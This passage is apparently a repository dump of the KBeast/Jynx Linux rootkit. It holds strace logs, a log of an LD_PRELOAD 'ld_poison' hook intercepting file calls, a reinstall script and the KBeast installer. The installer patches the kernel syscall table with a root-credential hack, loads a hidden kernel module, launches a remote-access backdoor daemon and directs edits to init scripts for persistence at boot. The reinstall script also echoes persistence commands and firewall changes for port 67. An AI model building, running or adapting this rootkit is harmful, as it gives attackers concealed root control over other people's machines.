PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fce000 62 | close(3) = 0 63 | open("/lib/libc.so.6", O_RDONLY) = 3 64 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340_{\0004\0\0\0"..., 512) = 512 65 | fstat64(3, {st_mode=S_IFREG|0755, st_size=1611564, ...}) = 0 66 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fcd000 67 | mmap2(0x7a0000, 1328580, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7a0000 68 | mmap2(0x8df000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13f) = 0x8df000 69 | mmap2(0x8e2000, 9668, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x8e2000 70 | close(3) = 0 71 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fcc000 72 | set_thread_area({entry_number:-1 -> 6, base_addr:0xb7fcc6c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 73 | mprotect(0x8df000, 8192, PROT_READ) = 0 74 | mprotect(0x797000, 4096, PROT_READ) = 0 75 | munmap(0xb7fce000, 38920) = 0 76 | getuid32() = 0 77 | geteuid32() = 0 78 | setuid32(0) = 0 79 | getuid32() = 0 80 | brk(0) = 0x8e9f000 81 | brk(0x8ec0000) = 0x8ec0000 82 | open("/var/run/shutdown.pid", O_RDONLY) = -1 ENOENT (No such file or directory) 83 | unlink("/var/run/shutdown.pid") = -1 ENOENT (No such file or directory) 84 | umask(022) = 022 85 | open("/var/run/shutdown.pid", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3 86 | getpid() = 10446 87 | fstat64(3, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0 88 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd7000 89 | write(3, "10446\n", 6) = 6 90 | close(3) = 0 91 | munmap(0xb7fd7000, 4096) = 0 92 | rt_sigaction(SIGQUIT, {0x1, [QUIT], SA_RESTART}, {SIG_DFL, [], 0}, 8) = 0 93 | rt_sigaction(SIGCHLD, {0x1, [CHLD], SA_RESTART}, {SIG_DFL, [], 0}, 8) = 0 94 | rt_sigaction(SIGHUP, {0x1, [HUP], SA_RESTART}, {SIG_DFL, [], 0}, 8) = 0 95 | rt_sigaction(SIGTSTP, {0x1, [TSTP], SA_RESTART}, {SIG_DFL, [], 0}, 8) = 0 96 | rt_sigaction(SIGTTIN, {0x1, [TTIN], SA_RESTART}, {SIG_DFL, [], 0}, 8) = 0 97 | rt_sigaction(SIGTTOU, {0x1, [TTOU], SA_RESTART}, {SIG_DFL, [], 0}, 8) = 0 98 | rt_sigaction(SIGINT, {0x804a210, [], 0}, NULL, 8) = 0 99 | chdir("/") = 0 100 | getuid32() = 0 101 | socket(PF_FILE, SOCK_STREAM, 0) = 3 102 | fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0 103 | connect(3, {sa_family=AF_FILE, path="/var/run/nscd/socket"...}, 110) = -1 ENOENT (No such file or directory) 104 | close(3) = 0 105 | socket(PF_FILE, SOCK_STREAM, 0) = 3 106 | fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0 107 | connect(3, {sa_family=AF_FILE, path="/var/run/nscd/socket"...}, 110) = -1 ENOENT (No such file or directory) 108 | close(3) = 0 109 | open("/etc/nsswitch.conf", O_RDONLY) = 3 110 | fstat64(3, {st_mode=S_IFREG|0644, st_size=1696, ...}) = 0 111 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd7000 112 | read(3, "#\n# /etc/nsswitch.conf\n#\n# An ex"..., 4096) = 1696 113 | read(3, "", 4096) = 0 114 | close(3) = 0 115 | munmap(0xb7fd7000, 4096) = 0 116 | open("/etc/ld.so.cache", O_RDONLY) = 3 117 | fstat64(3, {st_mode=S_IFREG|0644, st_size=38920, ...}) = 0 118 | mmap2(NULL, 38920, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fce000 119 | close(3) = 0 120 | open("/lib/libnss_files.so.2", O_RDONLY) = 3 121 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\30\0\0004\0\0\0"..., 512) = 512 122 | fstat64(3, {st_mode=S_IFREG|0755, st_size=46680, ...}) = 0 123 | mmap2(NULL, 41616, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x3b8000 124 | mmap2(0x3c1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x8) = 0x3c1000 125 | close(3) = 0 126 | mprotect(0x3c1000, 4096, PROT_READ) = 0 127 | munmap(0xb7fce000, 38920) = 0 128 | open("/etc/passwd", O_RDONLY) = 3 129 | fcntl64(3, F_GETFD) = 0 130 | fcntl64(3, F_SETFD, FD_CLOEXEC) = 0 131 | fstat64(3, {st_mode=S_IFREG|0644, st_size=1640, ...}) = 0 132 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd7000 133 | read(3, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1640 134 | close(3) = 0 135 | munmap(0xb7fd7000, 4096) = 0 136 | ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 137 | readlink("/proc/self/fd/0", "/dev/pts/0"..., 4095) = 10 138 | time(NULL) = 1326638174 139 | open("/etc/localtime", O_RDONLY) = 3 140 | fstat64(3, {st_mode=S_IFREG|0644, st_size=2819, ...}) = 0 141 | fstat64(3, {st_mode=S_IFREG|0644, st_size=2819, ...}) = 0 142 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd7000 143 | read(3, "TZif2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\4\0\0\0\0"..., 4096) = 2819 144 | close(3) = 0 145 | munmap(0xb7fd7000, 4096) = 0 146 | clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7fcc708) = 10447 147 | time(NULL) = 1326638174 148 | stat64("/etc/localtime", {st_mode=S_IFREG|0644, st_size=2819, ...}) = 0 149 | stat64("/etc/localtime", {st_mode=S_IFREG|0644, st_size=2819, ...}) = 0 150 | stat64("/etc/localtime", {st_mode=S_IFREG|0644, st_size=2819, ...}) = 0 151 | socket(PF_FILE, SOCK_DGRAM, 0) = 3 152 | fcntl64(3, F_SETFD, FD_CLOEXEC) = 0 153 | connect(3, {sa_family=AF_FILE, path="/dev/log"...}, 110) = 0 154 | send(3, "<13>Jan 15 06:36:14 shutdown[104"..., 68, MSG_NOSIGNAL) = 68 155 | close(3) = 0 156 | unlink("/var/run/shutdown.pid") = 0 157 | unlink("/etc/nologin") = -1 ENOENT (No such file or directory) 158 | sync() = 0 159 | rt_sigaction(SIGALRM, {0x8049900, [], 0}, NULL, 8) = 0 160 | alarm(3) = 0 161 | open("/dev/initctl", O_WRONLY) = 3 162 | write(3, "i\31\t\3\6\0\0\0\0\0\0\0\0\0\0\0INIT_HALT\0\0\0\0\0\0\0"..., 384) = 384 163 | close(3) = 0 164 | alarm(0) = 3 165 | execve("/sbin/init", ["/sbin/init", "6"], [/* 23 vars */]) = 0 166 | brk(0) = 0x8b15000 167 | access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) 168 | open("/etc/ld.so.cache", O_RDONLY) = 3 169 | fstat64(3, {st_mode=S_IFREG|0644, st_size=38920, ...}) = 0 170 | mmap2(NULL, 38920, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fd5000 171 | close(3) = 0 172 | open("/lib/libsepol.so.1", O_RDONLY) = 3 173 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\277\226\0004\0\0\0"..., 512) = 512 174 | fstat64(3, {st_mode=S_IFREG|0755, st_size=245376, ...}) = 0 175 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd4000 176 | mmap2(0x969000, 285024, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x969000 177 | mmap2(0x9a4000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3b) = 0x9a4000 178 | mmap2(0x9a5000, 39264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x9a5000 179 | close(3) = 0 180 | open("/lib/libselinux.so.1", O_RDONLY) = 3 181 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\240%\225\0004\0\0\0"..., 512) = 512 182 | fstat64(3, {st_mode=S_IFREG|0755, st_size=93508, ...}) = 0 183 | mmap2(0x94f000, 97120, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x94f000 184 | mmap2(0x965000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15) = 0x965000 185 | close(3) = 0 186 | open("/lib/libc.so.6", O_RDONLY) = 3 187 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340_{\0004\0\0\0"..., 512) = 512 188 | fstat64(3, {st_mode=S_IFREG|0755, st_size=1611564, ...}) = 0 189 | mmap2(0x7a0000, 1328580, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7a0000 190 | mmap2(0x8df000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13f) = 0x8df000 191 | mmap2(0x8e2000, 9668, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x8e2000 192 | close(3) = 0 193 | open("/lib/libdl.so.2", O_RDONLY) = 3 194 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0Pz\216\0004\0\0\0"..., 512) = 512 195 | fstat64(3, {st_mode=S_IFREG|0755, st_size=16428, ...}) = 0 196 | mmap2(0x8e7000, 12408, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x8e7000 197 | mmap2(0x8e9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1) = 0x8e9000 198 | close(3) = 0 199 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd3000 200 | set_thread_area({entry_number:-1 -> 6, base_addr:0xb7fd38e0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 201 | mprotect(0x8df000, 8192, PROT_READ) = 0 202 | mprotect(0x8e9000, 4096, PROT_READ) = 0 203 | mprotect(0x797000, 4096, PROT_READ) = 0 204 | munmap(0xb7fd5000, 38920) = 0 205 | access("/etc/selinux/", F_OK) = 0 206 | brk(0) = 0x8b15000 207 | brk(0x8b36000) = 0x8b36000 208 | open("/etc/selinux/config", O_RDONLY|O_LARGEFILE) = 3 209 | fstat64(3, {st_mode=S_IFREG|0644, st_size=448, ...}) = 0 210 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fde000 211 | read(3, "# This file controls the state o"..., 4096) = 448 212 | read(3, "", 4096) = 0 213 | close(3) = 0 214 | munmap(0xb7fde000, 4096) = 0 215 | open("/proc/mounts", O_RDONLY|O_LARGEFILE) = 3 216 | fstat64(3, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0 217 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fde000 218 | read(3, "rootfs / rootfs rw 0 0\n/dev/root"..., 4096) = 657 219 | close(3) = 0 220 | munmap(0xb7fde000, 4096) = 0 221 | open("/selinux/mls", O_RDONLY|O_LARGEFILE) = 3 222 | read(3, "1", 19) = 1 223 | close(3) = 0 224 | socket(PF_FILE, SOCK_STREAM, 0) = 3 225 | connect(3, {sa_family=AF_FILE, path="/var/run/setrans/.setrans-unix"...}, 110) = 0 226 | sendmsg(3, {msg_name(0)=NULL, msg_iov(5)=[{"\1\0\0\0", 4}, {"\1\0\0\0", 4}, {"\1\0\0\0", 4}, {"\0", 1}, {"\0", 1}], msg_controllen=0, msg_flags=0}, MSG_NOSIGNAL) = 14 227 | readv(3, [{"\1\0\0\0", 4}, {"\1\0\0\0", 4}, {"\0\0\0\0", 4}], 3) = 12 228 | readv(3, [{"\0", 1}], 1) = 1 229 | close(3) = 0 230 | umask(022) = 022 231 | geteuid32() = 0 232 | getpid() = 10446 233 | rt_sigaction(SIGALRM, {0x8049900, [], 0}, NULL, 8) = 0 234 | alarm(3) = 0 235 | open("/dev/initctl", O_WRONLY) = 3 236 | write(3, "i\31\t\3\1\0\0\0006\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 384) = 384 237 | close(3) = 0 238 | alarm(0) = 3 239 | exit_group(0) = ? 240 | -------------------------------------------------------------------------------- /reinstall.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "start" 3 | dir=`pwd` 4 | cd /usr/_dns4x_ 5 | ./setup clean 6 | cd $dir 7 | #time=`stat /etc/sysconfig/iptables | grep -i Modify | awk -F. '{print $1}' | awk '{print $2$3}'| awk -F- '{print $1$2$3}' | awk -F: '{print $1$2}'` 8 | #echo "-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 67 -j ACCEPT">>/etc/sysconfig/iptables 9 | #iptables -A INPUT -p tcp --dport 67 -j ACCEPT 10 | #iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 67 -j ACCEPT 11 | #service iptables save 12 | #service iptables restart 13 | echo $time 14 | #touch -t $time /etc/iptables 15 | ./setup build 0 16 | echo "---Do followings:---" 17 | echo "chkconfig --list |grep 3:on" 18 | echo "vi /etc/init.d/***" 19 | echo "---Adde the followings:---" 20 | echo "su - root -c /usr/_sh4x_/_h4x_bd > /dev/null 2>&1" 21 | echo "insmod /usr/_sh4x_/ipsecs-kbeast-v1.ko > /dev/null 2>&1" 22 | echo "---Check iptables---port:67" 23 | echo "vi /etc/sysconfig/iptables" 24 | echo "Then restart with:init 6" -------------------------------------------------------------------------------- /restart.log: -------------------------------------------------------------------------------- 1 | [-] ld_poison loaded. 2 | xstat64 hooked. 3 | Path: /mnt/hgfs/work_virtual/JynKbeast 4 | GID: 20 5 | xstat64 hooked. 6 | Path: . 7 | GID: 20 8 | __fxstat64 hooked. 9 | xstat64 hooked. 10 | Path: /etc/init.d/functions 11 | GID: 0 12 | __fxstat64 hooked. 13 | xstat64 hooked. 14 | Path: /etc/sysconfig/i18n 15 | GID: 0 16 | xstat64 hooked. 17 | Path: /etc/profile.d/lang.sh 18 | GID: 0 19 | __fxstat64 hooked. 20 | xstat64 hooked. 21 | Path: /etc/sysconfig/i18n 22 | GID: 0 23 | xstat64 hooked. 24 | Path: /etc/sysconfig/i18n 25 | GID: 0 26 | __fxstat64 hooked. 27 | xstat64 hooked. 28 | Path: /root/.i18n 29 | GID: 160120680 30 | xstat64 hooked. 31 | Path: /etc/sysconfig/init 32 | GID: 0 33 | xstat64 hooked. 34 | Path: /etc/sysconfig/init 35 | GID: 0 36 | __fxstat64 hooked. 37 | xstat64 hooked. 38 | Path: . 39 | GID: 0 40 | xstat64 hooked. 41 | Path: /sbin/env 42 | GID: 16 43 | xstat64 hooked. 44 | Path: /usr/sbin/env 45 | GID: 24 46 | xstat64 hooked. 47 | Path: /bin/env 48 | GID: 0 49 | xstat64 hooked. 50 | Path: /bin/env 51 | GID: 0 52 | [-] ld_poison loaded. 53 | __fxstat64 hooked. 54 | xstat64 hooked. 55 | Path: /etc/rc.d/init.d/functions 56 | GID: 0 57 | __fxstat64 hooked. 58 | xstat64 hooked. 59 | Path: /etc/sysconfig/i18n 60 | GID: 0 61 | xstat64 hooked. 62 | Path: /etc/profile.d/lang.sh 63 | GID: 0 64 | __fxstat64 hooked. 65 | xstat64 hooked. 66 | Path: /etc/sysconfig/i18n 67 | GID: 0 68 | xstat64 hooked. 69 | Path: /etc/sysconfig/i18n 70 | GID: 0 71 | __fxstat64 hooked. 72 | xstat64 hooked. 73 | Path: /.i18n 74 | GID: 155796592 75 | xstat64 hooked. 76 | Path: /etc/sysconfig/init 77 | GID: 0 78 | xstat64 hooked. 79 | Path: /etc/sysconfig/init 80 | GID: 0 81 | __fxstat64 hooked. 82 | xstat64 hooked. 83 | Path: /etc/sysconfig/sshd 84 | GID: 155787552 85 | Stopping sshd: xstat64 hooked. 86 | Path: /var/run/sshd.pid 87 | GID: 0 88 | xstat64 hooked. 89 | Path: /proc/29569 90 | GID: 0 91 | xstat64 hooked. 92 | Path: /proc/29569 93 | GID: 0 94 | xstat64 hooked. 95 | Path: . 96 | GID: 0 97 | xstat64 hooked. 98 | Path: /sbin/usleep 99 | GID: 24 100 | xstat64 hooked. 101 | Path: /usr/sbin/usleep 102 | GID: 24 103 | xstat64 hooked. 104 | Path: /bin/usleep 105 | GID: 0 106 | xstat64 hooked. 107 | Path: /bin/usleep 108 | GID: 0 109 | [-] ld_poison loaded. 110 | xstat64 hooked. 111 | Path: /proc/29569 112 | GID: 155908680 113 | xstat64 hooked. 114 | Path: /proc/29569 115 | GID: 155908680 116 | [ OK ] xstat64 hooked. 117 | Path: . 118 | GID: 0 119 | xstat64 hooked. 120 | Path: /sbin/rm 121 | GID: 16 122 | xstat64 hooked. 123 | Path: /usr/sbin/rm 124 | GID: 24 125 | xstat64 hooked. 126 | Path: /bin/rm 127 | GID: 0 128 | xstat64 hooked. 129 | Path: /bin/rm 130 | GID: 0 131 | [-] ld_poison loaded. 132 | unlink hooked. 133 | [-] ld_poison loaded. 134 | unlink hooked. 135 | 136 | xstat64 hooked. 137 | Path: /etc/ssh/ssh_host_key 138 | GID: 0 139 | xstat64 hooked. 140 | Path: /etc/ssh/ssh_host_rsa_key 141 | GID: 0 142 | xstat64 hooked. 143 | Path: /etc/ssh/ssh_host_dsa_key 144 | GID: 0 145 | xstat64 hooked. 146 | Path: . 147 | GID: 0 148 | xstat64 hooked. 149 | Path: /sbin/cp 150 | GID: 16 151 | xstat64 hooked. 152 | Path: /usr/sbin/cp 153 | GID: 24 154 | xstat64 hooked. 155 | Path: /bin/cp 156 | GID: 0 157 | xstat64 hooked. 158 | Path: /bin/cp 159 | GID: 0 160 | [-] ld_poison loaded. 161 | xstat64 hooked. 162 | Path: /var/empty/sshd/etc 163 | GID: 0 164 | __lxstat64 hooked. 165 | File: /etc/localtime 166 | GID: 0 167 | __lxstat64 hooked. 168 | File: /var/empty/sshd/etc/localtime 169 | GID: 0 170 | __fxstat64 hooked. 171 | __fxstat64 hooked. 172 | __fxstat64 hooked. 173 | xstat64 hooked. 174 | Path: /etc/localtime 175 | GID: 0 176 | xstat64 hooked. 177 | Path: /etc/localtime 178 | GID: 0 179 | Starting sshd: [ OK ] xstat64 hooked. 180 | Path: . 181 | GID: 0 182 | xstat64 hooked. 183 | Path: /sbin/touch 184 | GID: 16 185 | xstat64 hooked. 186 | Path: /usr/sbin/touch 187 | GID: 24 188 | xstat64 hooked. 189 | Path: /bin/touch 190 | GID: 0 191 | xstat64 hooked. 192 | Path: /bin/touch 193 | GID: 0 194 | [-] ld_poison loaded. 195 | 196 | -------------------------------------------------------------------------------- /setup: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Kernel Beast Ver #1.0 Installer 3 | #Copyright Ph03n1X of IPSECS (c) 2011 4 | #Get more research of ours http://ipsecs.com 5 | 6 | MAKE_FILE="./Makefile" 7 | TEMP_KFILE="./ipsecs-kbeast-v1.cc1" 8 | CONF_FILE="./config.h" 9 | C_KFILE="./dnsmodule.c" 10 | MOD_KFILE="./dnsmodule.ko" 11 | MODULE="dnsmodule" 12 | C_BFILE="./dnsdyn.c" 13 | EXEC_BFILE="./dnsdynm" 14 | SYSTEM_MAP_FILE="/boot/System.map-`uname -r`" 15 | LIB_MODULES="/lib/modules/`uname -r`/build" 16 | CC_OPTS="-Wall -lssl -lpcap" 17 | INSTDIR=$(cat $CONF_FILE |awk '/_H4X_PATH_/ {print $3}'|awk -F \" '{print $2}') 18 | DAEMON_USER=$(cat $CONF_FILE |awk '/_MAGIC_NAME_/ {print $3}'|awk -F \" '{print $2}') 19 | CURDIR=$(pwd) 20 | 21 | function IS_EXIST { 22 | if [ ! -f $1 ] 23 | then 24 | echo "[NOT OK]" 25 | exit 26 | else 27 | echo "[OK]" 28 | fi 29 | } 30 | 31 | function CHECK_KERNEL_HEADER { 32 | HEADER_DIR=`ls -l $1|awk -F \> '{print $2}'` 33 | if [ ! -d $HEADER_DIR ] && [ ! -d $1 ] 34 | then 35 | echo "[NOT OK] - Please Install!" 36 | exit 37 | else 38 | echo "[OK]" 39 | fi 40 | } 41 | 42 | function EXECZ { 43 | which $1 > /dev/null 44 | if [ $? -ne 0 ] 45 | then 46 | echo "[NOT OK] - Please Install" 47 | exit 48 | else 49 | EXECZZ=`which $1` 50 | echo $EXECZZ 51 | fi 52 | } 53 | 54 | function CREATE_DIR { 55 | cd .. 56 | if [ -d $INSTDIR ] 57 | then 58 | rm -rf $INSTDIR 59 | fi 60 | cp -rf $CURDIR $INSTDIR 61 | chmod 777 $INSTDIR 62 | if [ $? -eq 0 ] 63 | then 64 | echo "[OK]" 65 | else 66 | echo "[NOT OK]" 67 | exit 68 | fi 69 | } 70 | 71 | function check_kernelver { 72 | echo -n "Checking for kernel version : " 73 | uname -r|egrep "2.6.18|2.6.2[[:digit:]]|2.6.3[[:digit:]]" > /dev/null 2>&1 74 | if [ $? -ne 0 ] 75 | then 76 | echo "[-] Your kernel version is not currently supported by installer" 77 | echo "[+] As a guide for kernel 2.6.9 user, please remove sys_unlinkat" 78 | exit 79 | else 80 | echo "[OK]" 81 | fi 82 | } 83 | 84 | function build { 85 | echo -n "Checking for Makefile : "; IS_EXIST $MAKE_FILE 86 | echo -n "Checking for Network Daemon : "; IS_EXIST $C_BFILE 87 | echo -n "Checking for Config File : "; IS_EXIST $CONF_FILE 88 | echo -n "Checking for Kernel Header : "; CHECK_KERNEL_HEADER $LIB_MODULES 89 | echo -n "Checking for gcc : "; EXECZ "gcc"; GCCZZ=`which 'gcc'` 90 | echo -n "Checking for make : "; EXECZ "make"; MAKEZ=`which 'make'` 91 | check_kernelver 92 | echo -n "Creating Install Directory : "; CREATE_DIR 93 | cd $INSTDIR 94 | #rm -rf $CURDIR 95 | echo -n "Compiling Kernel Module : " 96 | $MAKEZ > /dev/null 2>&1 97 | IS_EXIST $MOD_KFILE 98 | echo -n "Compiling Network Daemon File : " 99 | $GCCZZ -o $EXEC_BFILE $CC_OPTS $C_BFILE > /dev/null 2>&1 100 | IS_EXIST $EXEC_BFILE 101 | echo -n "Inserting Loadable Kernel Module : " 102 | insmod $MOD_KFILE > /dev/null 2>&1 103 | if [ $? -eq 0 ] 104 | then 105 | echo "[OK]" 106 | else 107 | echo "[NOT OK]" 108 | exit; 109 | fi 110 | echo "Running Network Daemon for Remote Access :" 111 | su $DAEMON_USER -c $EXEC_BFILE 112 | echo "Build Complete!" 113 | echo 114 | echo "TO DO : modify init script to load this backdoor at start-up" 115 | echo "Example can be found on ./init/ directory" 116 | } 117 | 118 | function clean { 119 | echo -n "Checking for make : "; EXECZ "make"; MAKEZ=`which make` 120 | echo "Removing Kernel Module"; rmmod $MODULE > /dev/null 2>&1 121 | echo "Removing Compiled Kernel Module" 122 | $MAKEZ clean > /dev/null 2>&1 123 | echo "Stoping Network Daemon" 124 | killall -9 `echo $EXEC_BFILE|awk -F / '{print $2}'` >/dev/null 2>&1 125 | echo "Removing Backdoor File" 126 | rm -f $EXEC_BFILE 127 | echo "Removing Installation Directory" 128 | rm -rf $INSTDIR 129 | } 130 | 131 | function create_c { 132 | if [ -z $1 ] 133 | then 134 | UCRED='current_uid()' 135 | NEWCRED='struct cred *new=prepare_creds();if(new){new->uid=0;new->euid=0;new->gid=0;new->egid=0;commit_creds(new);return 0;}' 136 | PROCNET='init_net.proc_net' 137 | SEQSHOW='seq_ops.show' 138 | TASKBYPID='pid_task(find_pid_ns(pid, \&init_pid_ns), PIDTYPE_PID)' 139 | else 140 | if [ $1 -eq 1 ]; 141 | then 142 | UCRED='current_uid()' 143 | NEWCRED='struct cred *new=prepare_creds();if(new){new->uid=0;new->euid=0;new->gid=0;new->egid=0;commit_creds(new);return 0;}' 144 | PROCNET='init_net.proc_net' 145 | SEQSHOW='seq_ops.show' 146 | TASKBYPID='pid_task(find_pid_ns(pid, \&init_pid_ns), PIDTYPE_PID)' 147 | elif [ $1 -eq 0 ] 148 | then 149 | UCRED='current->uid' 150 | NEWCRED='current->uid=0;current->euid=0;current->gid=0;current->egid=0;return 0;' 151 | PROCNET='proc_net' 152 | SEQSHOW='seq_show' 153 | TASKBYPID='find_task_by_pid(pid)' 154 | else 155 | echo "ERROR : Wrong kernel version!" 156 | echo 157 | exit 158 | fi 159 | fi 160 | 161 | echo -n "Checking for Kernel Beast : "; IS_EXIST $TEMP_KFILE 162 | echo -n "Checking for sed : "; EXECZ "sed"; SEDZZ=`which sed` 163 | SYS_CALL_ADDR=`cat $SYSTEM_MAP_FILE|awk '/R sys_call_table/ {print $1}'` 164 | echo -n "Generating C file from .cc1 : " 165 | $SEDZZ -e "s/SYS_CALL_T_ADDRESS/$SYS_CALL_ADDR/" -e "s/USER_CRED/$UCRED/" \ 166 | -e "s/PROC_NET/$PROCNET/" -e "s/SEQ_SHOW/$SEQSHOW/" -e "s/CTASK_BY_PID/$TASKBYPID/" \ 167 | -e "s/NEW_CREDENTIAL/$NEWCRED/" $TEMP_KFILE > $C_KFILE 168 | IS_EXIST $C_KFILE 169 | } 170 | 171 | echo " 172 | ::::::::::: ::::::::: :::::::: :::::::::: :::::::: :::::::: 173 | :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: 174 | +:+ +:+ +:+ +:+ +:+ +:+ +:+ 175 | +#+ +#++:++#+ +#++:++#++ +#++:++# +#+ +#++:++#++ 176 | +#+ +#+ +#+ +#+ +#+ +#+ 177 | #+# #+# #+# #+# #+# #+# #+# #+# #+# 178 | ########### ### ######## ########## ######## ######## 179 | " 180 | 181 | if [ -z $1 ] 182 | then 183 | echo "Usage : $0 [version]" 184 | echo 185 | echo "build - to build kernel module, backdoor, and utility" 186 | echo "clean - to remove kernel module, backdoor, and utility" 187 | echo "version - 0 : 2.6.18 (RHEL/CentOS 5.x)" 188 | echo " 1 : 2.6.32 (Ubuntu 10.x) [default version]" 189 | echo 190 | exit 191 | else 192 | if [ ! -x /usr/bin/which ] 193 | then 194 | echo "ERR! Please install which!" 195 | exit 196 | fi 197 | if [ ! -x /bin/egrep ] 198 | then 199 | echo "ERR! Please install which!" 200 | exit 201 | fi 202 | case $1 in 203 | "build") 204 | create_c $2 205 | build 206 | ;; 207 | "clean") 208 | clean 209 | ;; 210 | *) 211 | echo "ERROR! wrong choice" 212 | ;; 213 | esac 214 | fi 215 | -------------------------------------------------------------------------------- /shutdown_r.log: -------------------------------------------------------------------------------- 1 | execve("/sbin/shutdown", ["shutdown", "r"], [/* 22 vars */]) = 0 2 | brk(0) = 0x8f22000 3 | access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) 4 | open("/etc/ld.so.cache", O_RDONLY) = 3 5 | fstat64(3, {st_mode=S_IFREG|0644, st_size=38920, ...}) = 0 6 | mmap2(NULL, 38920, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fab000 7 | close(3) = 0 8 | open("/lib/libc.so.6", O_RDONLY) = 3 9 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340_{\0004\0\0\0"..., 512) = 512 10 | fstat64(3, {st_mode=S_IFREG|0755, st_size=1611564, ...}) = 0 11 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7faa000 12 | mmap2(0x7a0000, 1328580, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7a0000 13 | mmap2(0x8df000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13f) = 0x8df000 14 | mmap2(0x8e2000, 9668, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x8e2000 15 | close(3) = 0 16 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fa9000 17 | set_thread_area({entry_number:-1 -> 6, 